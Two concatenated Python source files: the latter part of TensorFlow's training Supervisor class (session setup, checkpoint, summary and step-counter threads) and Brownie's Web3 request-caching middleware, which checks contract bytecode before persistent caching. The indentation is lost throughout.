session and check if it could be initialized automatically.
"""
# Value to pass for the 'ready_op', 'init_op', 'summary_op', 'saver',
# and 'global_step' parameters of Supervisor.__init__() to indicate that
# the default behavior should be used.
USE_DEFAULT = 0
def __init__(self,
graph=None,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT,
is_chief=True,
init_op=USE_DEFAULT,
init_feed_dict=None,
local_init_op=USE_DEFAULT,
logdir=None,
summary_op=USE_DEFAULT,
saver=USE_DEFAULT,
global_step=USE_DEFAULT,
save_summaries_secs=120,
save_model_secs=600,
recovery_wait_secs=30,
stop_grace_secs=120,
checkpoint_basename="model.ckpt",
session_manager=None,
summary_writer=USE_DEFAULT,
init_fn=None):
"""Create a `Supervisor`.
Args:
graph: A `Graph`. The graph that the model will use. Defaults to the
default `Graph`. The supervisor may add operations to the graph before
creating a session, but the graph should not be modified by the caller
after passing it to the supervisor.
ready_op: 1-D string `Tensor`. This tensor is evaluated by supervisors in
`prepare_or_wait_for_session()` to check if the model is ready to use.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from `tf.report_uninitialized_variables()` If
`None`, the model is not checked for readiness.
ready_for_local_init_op: 1-D string `Tensor`. This tensor is evaluated by
supervisors in `prepare_or_wait_for_session()` to check if the model is
ready to run the local_init_op.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from
`tf.report_uninitialized_variables(tf.global_variables())`. If `None`,
the model is not checked for readiness before running local_init_op.
is_chief: If True, create a chief supervisor in charge of initializing
and restoring the model. If False, create a supervisor that relies
on a chief supervisor for inits and restore.
init_op: `Operation`. Used by chief supervisors to initialize the model
when it can not be recovered. Defaults to an `Operation` that
initializes all global variables. If `None`, no initialization is done
automatically unless you pass a value for `init_fn`, see below.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
local_init_op: `Operation`. Used by all supervisors to run initializations
that should run for every new supervisor instance. By default these
are table initializers and initializers for local variables.
If `None`, no further per supervisor-instance initialization is
done automatically.
logdir: A string. Optional path to a directory where to checkpoint the
model and log events for the visualizer. Used by chief supervisors.
The directory will be created if it does not exist.
summary_op: An `Operation` that returns a Summary for the event logs.
Used by chief supervisors if a `logdir` was specified. Defaults to the
operation returned from summary.merge_all(). If `None`, summaries are
not computed automatically.
saver: A Saver object. Used by chief supervisors if a `logdir` was
        specified. Defaults to the saver returned by Saver().
If `None`, the model is not saved automatically.
global_step: An integer Tensor of size 1 that counts steps. The value
from 'global_step' is used in summaries and checkpoint filenames.
        Defaults to the op named 'global_step' in the graph if it exists, is of
rank 1, size 1, and of type tf.int32 or tf.int64. If `None` the global
step is not recorded in summaries and checkpoint files. Used by chief
supervisors if a `logdir` was specified.
save_summaries_secs: Number of seconds between the computation of
summaries for the event log. Defaults to 120 seconds. Pass 0 to
disable summaries.
save_model_secs: Number of seconds between the creation of model
checkpoints. Defaults to 600 seconds. Pass 0 to disable checkpoints.
recovery_wait_secs: Number of seconds between checks that the model
is ready. Used by supervisors when waiting for a chief supervisor
to initialize or restore the model. Defaults to 30 seconds.
stop_grace_secs: Grace period, in seconds, given to running threads to
stop when `stop()` is called. Defaults to 120 seconds.
checkpoint_basename: The basename for checkpoint saving.
session_manager: `SessionManager`, which manages Session creation and
recovery. If it is `None`, a default `SessionManager` will be created
with the set of arguments passed in for backwards compatibility.
summary_writer: `SummaryWriter` to use or `USE_DEFAULT`. Can be `None`
to indicate that no summaries should be written.
init_fn: Optional callable used to initialize the model. Called
after the optional `init_op` is called. The callable must accept one
argument, the session being initialized.
Returns:
A `Supervisor`.
"""
# Set default values of arguments.
if graph is None:
graph = ops.get_default_graph()
with graph.as_default():
self._init_ready_op(
ready_op=ready_op, ready_for_local_init_op=ready_for_local_init_op)
self._init_init_op(init_op=init_op, init_feed_dict=init_feed_dict)
self._init_local_init_op(local_init_op=local_init_op)
self._init_saver(saver=saver)
self._init_summary_op(summary_op=summary_op)
self._init_global_step(global_step=global_step)
self._graph = graph
self._meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True),
saver_def=self._saver.saver_def if self._saver else None)
self._is_chief = is_chief
self._coord = coordinator.Coordinator()
self._recovery_wait_secs = recovery_wait_secs
self._stop_grace_secs = stop_grace_secs
self._init_fn = init_fn
# Set all attributes related to checkpointing and writing events to None.
# Afterwards, set them appropriately for chief supervisors, as these are
# the only supervisors that can write checkpoints and events.
self._logdir = None
self._save_summaries_secs = None
self._save_model_secs = None
self._save_path = None
self._summary_writer = None
if self._is_chief:
self._logdir = logdir
self._save_summaries_secs = save_summaries_secs
self._save_model_secs = save_model_secs
if self._logdir:
self._save_path = os.path.join(self._logdir, checkpoint_basename)
if summary_writer is Supervisor.USE_DEFAULT:
if self._logdir:
self._summary_writer = _summary.FileWriter(self._logdir)
else:
self._summary_writer = summary_writer
self._graph_added_to_summary = False
self._init_session_manager(session_manager=session_manager)
self._verify_setup()
# The graph is not allowed to change anymore.
graph.finalize()
def _init_session_manager(self, session_manager=None):
if session_manager is None:
self._session_manager = session_manager_mod.SessionManager(
local_init_op=self._local_init_op,
ready_op=self._ready_op,
ready_for_local_init_op=self._ready_for_local_init_op,
graph=self._graph,
recovery_wait_secs=self._recovery_wait_secs)
else:
self._session_manager = session_manager
def _get_first_op_from_collection(self, key):
"""Returns the first `Operation` from a collection.
Args:
key: A string collection key.
Returns:
The first Op found in a collection, or `None` if the collection is empty.
"""
try:
op_list = ops.get_collection(key)
if len(op_list) > 1:
logging.info("Found %d %s operations. Returning the first one.",
len(op_list), key)
if op_list:
return op_list[0]
except LookupError:
pass
return None
def _init_ready_op(self,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT):
"""Initializes ready_op.
Args:
ready_op: `Tensor` to check if the model is initialized.
If it's set to USE_DEFAULT, creates an op that checks all
the variables are initialized.
ready_for_local_init_op: `Tensor` to check if the model is ready to run
local_init_op.
If it's set to USE_DEFAULT, creates an op that checks all
the global variables are initialized.
"""
if ready_op is Supervisor.USE_DEFAULT:
ready_op = self._get_first_op_from_collection(ops.GraphKeys.READY_OP)
if ready_op is None:
ready_op = variables.report_uninitialized_variables()
ops.add_to_collection(ops.GraphKeys.READY_OP, ready_op)
self._ready_op = ready_op
# ready_for_local_init_op defaults to None for backward compatibility
if ready_for_local_init_op is Supervisor.USE_DEFAULT:
ready_for_local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.READY_FOR_LOCAL_INIT_OP)
self._ready_for_local_init_op = ready_for_local_init_op
def _init_init_op(self, init_op=USE_DEFAULT, init_feed_dict=None):
"""Initializes init_op.
Args:
init_op: `Operation` to initialize the variables. If set to USE_DEFAULT,
create an op that initializes all variables and tables.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
"""
if init_op is Supervisor.USE_DEFAULT:
init_op = self._get_first_op_from_collection(ops.GraphKeys.INIT_OP)
if init_op is None:
init_op = variables.global_variables_initializer()
ops.add_to_collection(ops.GraphKeys.INIT_OP, init_op)
self._init_op = init_op
self._init_feed_dict = init_feed_dict
def _init_local_init_op(self, local_init_op=USE_DEFAULT):
"""Initializes local_init_op.
Args:
local_init_op: `Operation` run for every new supervisor instance. If set
to USE_DEFAULT, use the first op from the GraphKeys.LOCAL_INIT_OP
collection. If the collection is empty, create an op that initializes
all local variables and all tables.
"""
if local_init_op is Supervisor.USE_DEFAULT:
local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.LOCAL_INIT_OP)
if local_init_op is None:
op_list = [
variables.local_variables_initializer(),
lookup_ops.tables_initializer()
]
if op_list:
local_init_op = control_flow_ops.group(*op_list)
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
self._local_init_op = local_init_op
def _init_saver(self, saver=USE_DEFAULT):
"""Initializes saver.
Args:
saver: A `Saver` object. If set to USE_DEFAULT, create one that
saves all the variables.
"""
if saver is Supervisor.USE_DEFAULT:
saver = self._get_first_op_from_collection(ops.GraphKeys.SAVERS)
if saver is None and variables.global_variables():
saver = saver_mod.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
self._saver = saver
def _init_summary_op(self, summary_op=USE_DEFAULT):
"""Initializes summary_op.
Args:
summary_op: An Operation that returns a Summary for the event logs.
If set to USE_DEFAULT, create an op that merges all the summaries.
"""
if summary_op is Supervisor.USE_DEFAULT:
summary_op = self._get_first_op_from_collection(ops.GraphKeys.SUMMARY_OP)
if summary_op is None:
summary_op = _summary.merge_all()
if summary_op is not None:
ops.add_to_collection(ops.GraphKeys.SUMMARY_OP, summary_op)
self._summary_op = summary_op
def _init_global_step(self, global_step=USE_DEFAULT):
"""Initializes global_step.
Args:
global_step: An integer Tensor of size 1 that counts steps. If
set to USE_DEFAULT, creates global_step tensor.
"""
if global_step is Supervisor.USE_DEFAULT:
global_step = self._get_first_op_from_collection(
ops.GraphKeys.GLOBAL_STEP)
if global_step is None:
global_step = self._default_global_step_tensor()
if global_step is not None:
ops.add_to_collection(ops.GraphKeys.GLOBAL_STEP, global_step)
self._global_step = global_step
@property
def is_chief(self):
"""Return True if this is a chief supervisor.
Returns:
A bool.
"""
return self._is_chief
@property
def session_manager(self):
"""Return the SessionManager used by the Supervisor.
Returns:
A SessionManager object.
"""
return self._session_manager
@property
def coord(self):
"""Return the Coordinator used by the Supervisor.
The Coordinator can be useful if you want to run multiple threads
during your training.
Returns:
A Coordinator object.
"""
return self._coord
@property
def init_op(self):
"""Return the Init Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._init_op
@property
def init_feed_dict(self):
"""Return the feed dictionary used when evaluating the `init_op`.
Returns:
A feed dictionary or `None`.
"""
return self._init_feed_dict
@property
def ready_op(self):
"""Return the Ready Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._ready_op
@property
def ready_for_local_init_op(self):
return self._ready_for_local_init_op
@property
def summary_writer(self):
"""Return the SummaryWriter used by the chief supervisor.
Returns:
A SummaryWriter.
"""
return self._summary_writer
@property
def summary_op(self):
"""Return the Summary Tensor used by the chief supervisor.
Returns:
A string Tensor for the summary or `None`.
"""
return self._summary_op
@property
def save_summaries_secs(self):
"""Return the delay between summary computations.
Returns:
A timestamp.
"""
return self._save_summaries_secs
@property
def global_step(self):
"""Return the global_step Tensor used by the supervisor.
Returns:
An integer Tensor for the global_step.
"""
return self._global_step
@property
def saver(self):
"""Return the Saver used by the supervisor.
Returns:
A Saver object.
"""
return self._saver
@property
def save_model_secs(self):
"""Return the delay between checkpoints.
Returns:
A timestamp.
"""
return self._save_model_secs
@property
def save_path(self):
"""Return the save path used by the supervisor.
Returns:
A string.
"""
return self._save_path
def _write_graph(self):
"""Writes graph_def to `logdir` and adds it to summary if applicable."""
assert self._is_chief
if self._logdir:
training_util.write_graph(self._graph.as_graph_def(add_shapes=True),
self._logdir, "graph.pbtxt")
if self._summary_writer and not self._graph_added_to_summary:
self._summary_writer.add_graph(self._graph)
self._summary_writer.add_meta_graph(self._meta_graph_def)
self._graph_added_to_summary = True
def start_standard_services(self, sess):
"""Start the standard services for 'sess'.
This starts services in the background. The services started depend
on the parameters to the constructor and may include:
- A Summary thread computing summaries every save_summaries_secs.
- A Checkpoint thread saving the model every save_model_secs.
      - A StepCounter thread measuring step time.
Args:
sess: A Session.
Returns:
A list of threads that are running the standard services. You can use
the Supervisor's Coordinator to join these threads with:
sv.coord.Join(<list of threads>)
Raises:
RuntimeError: If called with a non-chief Supervisor.
      ValueError: If no `logdir` was passed to the constructor as the
services need a log directory.
"""
if not self._is_chief:
raise RuntimeError("Only chief supervisor can start standard services. "
"Because only chief supervisors can write events.")
if not self._logdir:
logging.warning("Standard services need a 'logdir' "
"passed to the SessionManager")
return
if self._global_step is not None and self._summary_writer:
# Only add the session log if we keep track of global step.
# TensorBoard cannot use START message for purging expired events
# if there is no step value.
current_step = training_util.global_step(sess, self._global_step)
self._summary_writer.add_session_log(
SessionLog(status=SessionLog.START),
current_step)
threads = []
if self._save_summaries_secs and self._summary_writer:
if self._summary_op is not None:
threads.append(SVSummaryThread(self, sess))
if self._global_step is not None:
threads.append(SVStepCounterThread(self, sess))
if self.saver and self._save_model_secs:
threads.append(SVTimerCheckpointThread(self, sess))
for t in threads:
t.start()
return threads
def prepare_or_wait_for_session(self, master="", config=None,
wait_for_checkpoint=False,
max_wait_secs=7200,
start_standard_services=True):
"""Make sure the model is ready to be used.
Create a session on 'master', recovering or initializing the model as
needed, or wait for a session to be ready. If running as the chief
    and `start_standard_services` is set to True, also call the session
manager to start the standard services.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional ConfigProto proto used to configure the session,
which is passed as-is to create the session.
wait_for_checkpoint: Whether we should wait for the availability of a
checkpoint before creating Session. Defaults to False.
max_wait_secs: Maximum time to wait for the session to become available.
start_standard_services: Whether to start the standard services and the
queue runners.
Returns:
A Session object that can be used to drive the model.
"""
# For users who recreate the session with prepare_or_wait_for_session(), we
# need to clear the coordinator's stop_event so that threads managed by the
# coordinator can run.
self._coord.clear_stop()
if self._summary_writer:
self._summary_writer.reopen()
if self._is_chief:
sess = self._session_manager.prepare_session(
master, init_op=self.init_op, saver=self.saver,
checkpoint_dir=self._logdir, wait_for_checkpoint=wait_for_checkpoint,
max_wait_secs=max_wait_secs, config=config,
init_feed_dict=self._init_feed_dict, init_fn=self._init_fn)
self._write_graph()
if start_standard_services:
logging.info("Starting standard services.")
self.start_standard_services(sess)
else:
sess = self._session_manager.wait_for_session(master,
config=config,
max_wait_secs=max_wait_secs)
if start_standard_services:
logging.info("Starting queue runners.")
self.start_queue_runners(sess)
return sess
def start_queue_runners(self, sess, queue_runners=None):
"""Start threads for `QueueRunners`.
Note that the queue runners collected in the graph key `QUEUE_RUNNERS`
are already started automatically when you create a session with the
supervisor, so unless you have non-collected queue runners to start
you do not need to call this explicitly.
Args:
sess: A `Session`.
queue_runners: A list of `QueueRunners`. If not specified, we'll use the
list of queue runners gathered in the graph under the key
`GraphKeys.QUEUE_RUNNERS`.
Returns:
The list of threads started for the `QueueRunners`.
"""
if queue_runners is None:
queue_runners = self._graph.get_collection(ops.GraphKeys.QUEUE_RUNNERS)
threads = []
for qr in queue_runners:
threads.extend(qr.create_threads(sess, coord=self._coord, daemon=True,
start=True))
return threads
def loop(self, timer_interval_secs, target, args=None, kwargs=None):
"""Start a LooperThread that calls a function periodically.
If `timer_interval_secs` is None the thread calls `target(*args, **kwargs)`
repeatedly. Otherwise it calls it every `timer_interval_secs`
seconds. The thread terminates when a stop is requested.
The started thread is added to the list of threads managed by the supervisor
so it does not need to be passed to the `stop()` method.
Args:
timer_interval_secs: Number. Time boundaries at which to call `target`.
target: A callable object.
args: Optional arguments to pass to `target` when calling it.
kwargs: Optional keyword arguments to pass to `target` when calling it.
Returns:
The started thread.
"""
looper = coordinator.LooperThread(self._coord, timer_interval_secs,
target=target, args=args, kwargs=kwargs)
looper.start()
return looper
def stop(self, threads=None, close_summary_writer=True):
"""Stop the services and the coordinator.
This does not close the session.
Args:
threads: Optional list of threads to join with the coordinator. If
`None`, defaults to the threads running the standard services, the
threads started for `QueueRunners`, and the threads started by the
`loop()` method. To wait on additional threads, pass the
list in this parameter.
close_summary_writer: Whether to close the `summary_writer`. Defaults to
`True` if the summary writer was created by the supervisor, `False`
otherwise.
"""
self._coord.request_stop()
try:
# coord.join() re-raises the first reported exception; the "finally"
# block ensures that we clean up whether or not an exception was
# reported.
self._coord.join(threads,
stop_grace_period_secs=self._stop_grace_secs)
finally:
# Close the writer last, in case one of the running threads was using it.
if close_summary_writer and self._summary_writer:
# Stop messages are not logged with event.step,
# since the session may have already terminated.
self._summary_writer.add_session_log(SessionLog(status=SessionLog.STOP))
self._summary_writer.close()
self._graph_added_to_summary = False
def request_stop(self, ex=None):
"""Request that the coordinator stop the threads.
See `Coordinator.request_stop()`.
Args:
ex: Optional `Exception`, or Python `exc_info` tuple as returned by
`sys.exc_info()`. If this is the first call to `request_stop()` the
corresponding exception is recorded and re-raised from `join()`.
"""
self._coord.request_stop(ex=ex)
def should_stop(self):
"""Check if the coordinator was told to stop.
See `Coordinator.should_stop()`.
Returns:
True if the coordinator was told to stop, False otherwise.
"""
return self._coord.should_stop()
def stop_on_exception(self):
"""Context handler to stop the supervisor when an exception is raised.
See `Coordinator.stop_on_exception()`.
Returns:
A context handler.
"""
return self._coord.stop_on_exception()
def wait_for_stop(self):
"""Block waiting for the coordinator to stop."""
self._coord.wait_for_stop()
def summary_computed(self, sess, summary, global_step=None):
"""Indicate that a summary was computed.
Args:
sess: A `Session` object.
summary: A Summary proto, or a string holding a serialized summary proto.
global_step: Int. global step this summary is associated with. If `None`,
it will try to fetch the current step.
Raises:
TypeError: if 'summary' is not a Summary proto or a string.
RuntimeError: if the Supervisor was created without a `logdir`.
"""
if not self._summary_writer:
raise RuntimeError("Writing a summary requires a summary writer.")
if global_step is None and self.global_step is not None:
global_step = training_util.global_step(sess, self.global_step)
self._summary_writer.add_summary(summary, global_step)
def _default_global_step_tensor(self):
"""Returns the global_step from the default graph.
Returns:
The global step `Tensor` or `None`.
"""
try:
gs = ops.get_default_graph().get_tensor_by_name("global_step:0")
if gs.dtype.base_dtype in [dtypes.int32, dtypes.int64]:
return gs
else:
logging.warning("Found 'global_step' is not an int type: %s", gs.dtype)
return None
except KeyError:
return None
def _verify_setup(self):
"""Check that all is good.
Raises:
ValueError: If something is not good.
"""
# Not running as chief means that replicas are used.
# In that case all Variables must have their device set.
if not self._is_chief:
for op in self._graph.get_operations():
if op.type in ["Variable", "VariableV2"] and not op.device:
raise ValueError("When using replicas, all Variables must have "
"their device set: %s" % op)
# pylint: disable=g-doc-return-or-yield,broad-except
@contextlib.contextmanager
def managed_session(self, master="", config=None,
start_standard_services=True,
close_summary_writer=True):
"""Returns a context manager for a managed session.
This context manager creates and automatically recovers a session. It
optionally starts the standard services that handle checkpoints and
summaries. It monitors exceptions raised from the `with` block or from the
services and stops the supervisor as needed.
The context manager is typically used as follows:
```python
def train():
sv = tf.train.Supervisor(...)
with sv.managed_session(<master>) as sess:
for step in xrange(..):
if sv.should_stop():
break
sess.run(<my training op>)
...do other things needed at each training step...
```
An exception raised from the `with` block or one of the service threads is
raised again when the block exits. This is done after stopping all threads
and closing the session. For example, an `AbortedError` exception, raised
in case of preemption of one of the workers in a distributed model, is
raised again when the block exits.
If you want to retry the training loop in case of preemption you can do it
as follows:
```python
def main(...):
      while True:
try:
train()
except tf.errors.Aborted:
pass
```
As a special case, exceptions used for control flow, such as
`OutOfRangeError` which reports that input queues are exhausted, are not
raised again from the `with` block: they indicate a clean termination of
the training loop and are considered normal termination.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional `ConfigProto` proto used to configure the session.
Passed as-is to create the session.
start_standard_services: Whether to start the standard services,
such as checkpoint, summary and step counter.
close_summary_writer: Whether to close the summary writer when
closing the session. Defaults to True.
Returns:
A context manager that yields a `Session` restored from the latest
    checkpoint or initialized from scratch if no checkpoint exists. The
session is closed when the `with` block exits.
"""
try:
sess = self.prepare_or_wait_for_session(
master=master, config=config,
start_standard_services=start_standard_services)
yield sess
except Exception as e:
self.request_stop(e)
finally:
try:
# Request all the threads to stop and wait for them to do so. Any
# exception raised by the threads is raised again from stop().
# Passing stop_grace_period_secs is for blocked enqueue/dequeue
# threads which are not checking for `should_stop()`. They
# will be stopped when we close the session further down.
self.stop(close_summary_writer=close_summary_writer)
finally:
# Close the session to finish up all pending calls. We do not care
# about exceptions raised when closing. This takes care of
# blocked enqueue/dequeue calls.
try:
sess.close()
except Exception:
# Silently ignore exceptions raised by close().
pass
# pylint: enable=g-doc-return-or-yield,broad-except
class SVSummaryThread(coordinator.LooperThread):
"""A thread to save summaries on a timer."""
def __init__(self, sv, sess):
"""Create a SVSummaryThread.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVSummaryThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
if self._sv.global_step is not None:
summary_strs, global_step = self._sess.run([self._sv.summary_op,
self._sv.global_step], feed_dict=trainset.get_feed_dict(dest='summary'))
else:
summary_strs = self._sess.run(self._sv.summary_op, feed_dict=trainset.get_feed_dict(dest='summary'))
global_step = None
if self._sv.summary_writer:
logging.info("Recording summary at step %s.", global_step)
self._sv.summary_writer.add_summary(summary_strs, global_step)
class SVStepCounterThread(coordinator.LooperThread):
"""Threads to count steps and measure their duration."""
def __init__(self, sv, sess, step_counter=None):
"""Create a `SVStepCounterThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
step_counter: A `Tensor` holding the step counter. By defaults, it uses
sv.global_step.
"""
super(SVStepCounterThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
self._last_time = 0.0
self._last_step = 0
step_counter = sv.global_step if step_counter is None else step_counter
self._step_counter = step_counter
self._summary_tag = "%s/sec" % self._step_counter.op.name
def start_loop(self):
self._last_time = time.time()
self._last_step = training_util.global_step(
self._sess, self._step_counter)
def run_loop(self):
# Count the steps.
current_step = training_util.global_step(self._sess, self._step_counter)
added_steps = current_step - self._last_step
self._last_step = current_step
# Measure the elapsed time.
current_time = time.time()
elapsed_time = current_time - self._last_time
self._last_time = current_time
# Reports the number of steps done per second
if elapsed_time > 0.:
steps_per_sec = added_steps / elapsed_time
else:
steps_per_sec = float("inf")
summary = Summary(value=[Summary.Value(tag=self._summary_tag,
simple_value=steps_per_sec)])
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary, current_step)
logging.log_first_n(logging.INFO, "%s: %g", 10,
self._summary_tag, steps_per_sec)
class SVTimerCheckpointThread(coordinator.LooperThread):
"""A thread to checkpoint on a timer."""
def __init__(self, sv, sess):
"""Create a `SVTimerCheckpointThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVTimerCheckpointThread, self).__init__(sv.coord, sv.save_model_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
logging.info("Saving checkpoint to path %s", self._sv.save_path)
self._sv.saver.save(self._sess, self._sv.save_path,
global_step=self._sv.global_step)
if self._sv.summary_writer and self._sv.global_step is not None:
current_step = training_util.global_step(self._sess, self._sv.global_step)
self._sv.summary_writer.add_session_log(
SessionLog(status=SessionLog.CHECKPOINT,
checkpoint_path=self._sv.save_path),
current_step)
# TODO(sherrym): All non-PEP8 compliant names will be deprecated shortly.
setattr(Supervisor, "PrepareSession", Supervisor.prepare_or_wait_for_session)
setattr(Supervisor, "StartQueueRunners", Supervisor.start_queue_runners)
setattr(Supervisor, "StartStandardServices", Supervisor.start_standard_services)
setattr(Supervisor, "Stop", Supervisor.stop)
setattr(Supervisor, "RequestStop", Supervisor.request_stop)
setattr(Supervisor, "Loop", Supervisor.loop)
setattr(Supervisor, "ShouldStop", Supervisor.should_stop)
setattr(Supervisor, "StopOnException", Supervisor.stop_on_exception)
setattr(Supervisor, "WaitForStop", Supervisor.wait_for_stop)
setattr(Supervisor, "SummaryComputed", Supervisor.summary_computed)
|
caching.py
|
import json
import threading
import time
from collections import OrderedDict
from typing import Any, Callable, Dict, List, Optional
from hexbytes import HexBytes
from web3 import Web3
from brownie._config import CONFIG, _get_data_folder
from brownie.network.middlewares import BrownieMiddlewareABC
from brownie.utils.sql import Cursor
# calls to the following RPC endpoints are stored in a persistent cache
# if the returned data evaluates true when passed into the lambda
LONGTERM_CACHE = {
"eth_getCode": lambda w3, data: is_cacheable_bytecode(w3, data),
}
def _strip_push_data(bytecode: HexBytes) -> HexBytes:
idx = 0
while idx < len(bytecode):
# if instruction is between PUSH1 and PUSH32
if 0x60 <= bytecode[idx] <= 0x7F:
offset = idx + 1
length = bytecode[idx] - 0x5F
bytecode = HexBytes(bytecode[:offset] + bytecode[offset + length :])
idx += 1
return bytecode
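# Illustrative sketch of `_strip_push_data` (example bytes chosen for clarity,
# not taken from a real contract): PUSH1 0x01 PUSH1 0x02 ADD
#
#   _strip_push_data(HexBytes("0x6001600201"))  # -> HexBytes("0x606001")
#
# The push arguments are dropped so later checks only ever see opcodes.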
def is_cacheable_bytecode(web3: Web3, bytecode: HexBytes) -> bool:
"""
Check if bytecode can safely be cached.
To safely cache bytecode we verify that the code cannot be removed via a
SELFDESTRUCT operation, or a SELFDESTRUCT triggered via a DELEGATECALL.
Arguments
---------
web3 : Web3
Web3 object connected to the same network that the bytecode exists on.
bytecode : HexBytes
Deployed bytecode to be analyzed.
Returns
-------
bool
Can this bytecode be cached?
"""
if not bytecode:
# do not cache empty code, something might be deployed there later!
return False
bytecode = HexBytes(bytecode)
opcodes = _strip_push_data(bytecode)
if 0xFF in opcodes:
# cannot cache if the code contains a SELFDESTRUCT instruction
return False
for idx in [i for i in range(len(opcodes)) if opcodes[i] == 0xF4]:
# cannot cache if the code performs a DELEGATECALL to a non-hardcoded address
if idx < 2:
return False
if opcodes[idx - 2 : idx] != HexBytes("0x735A"):
# if the instruction is not immediately preceded by PUSH20 GAS,
# the target was not hardcoded and we cannot cache
return False
# check if the target code of each delegatecall is also cachable
# if yes then we can cache this contract as well
push20_indexes = [
i for i in range(len(bytecode) - 22) if bytecode[i] == 0x73 and bytecode[i + 22] == 0xF4
]
for address in [bytecode[i + 1 : i + 21] for i in push20_indexes]:
if not int(address.hex(), 16):
# if the delegatecall targets 0x00 this is a factory pattern, we can ignore
continue
target_bytecode = web3.eth.get_code(address)
if not is_cacheable_bytecode(web3, target_bytecode):
return False
return True
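# Illustrative usage sketch (assumes a connected `Web3` instance `w3` and a
# contract address `addr`; not executed as part of this module):
#
#   code = w3.eth.get_code(addr)
#   if is_cacheable_bytecode(w3, code):
#       pass  # safe to store the eth_getCode result in the persistent cache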
def _new_filter(w3: Web3) -> Any:
# returns a filter if the client is connected and supports filtering
try:
block_filter = w3.eth.filter("latest")
block_filter.get_new_entries()
return block_filter
except (AttributeError, ValueError):
return None
class RequestCachingMiddleware(BrownieMiddlewareABC):
"""
Web3 middleware for request caching.
"""
def __init__(self, w3: Web3) -> None:
self.w3 = w3
self.table_key = f"chain{CONFIG.active_network['chainid']}"
self.cur = Cursor(_get_data_folder().joinpath("cache.db"))
self.cur.execute(f"CREATE TABLE IF NOT EXISTS {self.table_key} (method, params, result)")
latest = w3.eth.get_block("latest")
self.last_block = latest.hash
self.last_block_seen = latest.timestamp
self.last_request = 0.0
self.block_cache: OrderedDict = OrderedDict()
self.block_filter = w3.eth.filter("latest")
self.lock = threading.Lock()
self.event = threading.Event()
self.is_killed = False
threading.Thread(target=self.block_filter_loop, daemon=True).start()
@classmethod
def get_layer(cls, w3: Web3, network_type: str) -> Optional[int]:
if network_type != "live":
# do not cache on development chains
return None
try:
latest = w3.eth.get_block("latest")
except Exception:
return None
if latest.timestamp - w3.eth.get_block(latest.number - 50).timestamp < 250:
# do not cache on chains with an average block time of less than 5 seconds
return None
if _new_filter(w3) is None:
# do not cache if we cannot create a filter for new blocks
return None
return 0
@property
def time_since(self) -> float:
return time.time() - self.last_request
def block_filter_loop(self) -> None:
while not self.is_killed:
# if the last RPC request was > 60 seconds ago, reduce the rate of updates.
# we eventually settle at one query per minute after 10 minutes of no requests.
with self.lock:
if self.time_since > 60:
self.block_cache.clear()
self.event.clear()
if self.time_since > 60:
self.event.wait(min(self.time_since / 10, 60))
# query the filter for new blocks
with self.lock:
try:
new_blocks = self.block_filter.get_new_entries()
except (AttributeError, ValueError):
# web3 has disconnected, or the filter has expired from inactivity
# some public nodes allow a filter initially, but block it several seconds later
block_filter = _new_filter(self.w3)
if block_filter is None:
return
self.block_filter = block_filter
continue
if new_blocks:
self.block_cache[new_blocks[-1]] = {}
self.last_block = new_blocks[-1]
self.last_block_seen = time.time()
if len(self.block_cache) > 5:
old_key = list(self.block_cache)[0]
del self.block_cache[old_key]
if new_blocks and self.time_since < 15:
# if this update found a new block and we've been querying
# frequently, we can wait a few seconds before the next update
time.sleep(5)
elif time.time() - self.last_block_seen < 15:
# if it's been less than 15 seconds since the last block, wait 2 seconds
time.sleep(2)
else:
# if it's been more than 15 seconds, only wait 1 second
time.sleep(1)
def process_request(self, make_request: Callable, method: str, params: List) -> Dict:
if method in (
# caching any of these means we die of recursion death so let's not do that
"eth_getFilterChanges",
"eth_newBlockFilter",
"eth_uninstallFilter",
# used to check connectivity
"web3_clientVersion",
# caching these causes weirdness with transaction replacement
"eth_sendTransaction",
"eth_sendRawTransaction",
"eth_sign",
"eth_signTransaction",
):
return make_request(method, params)
# try to return a cached value
param_str = json.dumps(params, separators=(",", ""), default=str)
# check if the value is available within the long-term cache
if method in LONGTERM_CACHE:
row = self.cur.fetchone(
f"SELECT result FROM {self.table_key} WHERE method=? AND params=?",
(method, param_str),
)
if row:
data = row[0]
if isinstance(data, bytes):
data = HexBytes(data)
return {"id": "cache", "jsonrpc": "2.0", "result": data}
with self.lock:
self.last_request = time.time()
self.event.set()
try:
return self.block_cache[self.last_block][method][param_str]
except KeyError:
pass
# cached value is unavailable, make a request and cache the result
with self.lock:
response = make_request(method, params)
self.block_cache.setdefault(self.last_block, {}).setdefault(method, {})
self.block_cache[self.last_block][method][param_str] = response
# check if the value can be added to long-term cache
if "result" in response and method in LONGTERM_CACHE:
result = response["result"]
if LONGTERM_CACHE[method](self.w3, result):
if isinstance(result, (dict, list, tuple)):
result = json.dumps(response, separators=(",", ""), default=str)
self.cur.insert(self.table_key, method, param_str, result)
return response
def uninstall(self) -> None:
self.is_killed = True
self.block_cache.clear()
if self.w3.isConnected():
self.w3.eth.uninstallFilter(self.block_filter.filter_id)
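# Sketch of the two cache layers used by RequestCachingMiddleware (shapes only,
# as an orientation aid; the values shown are illustrative):
#
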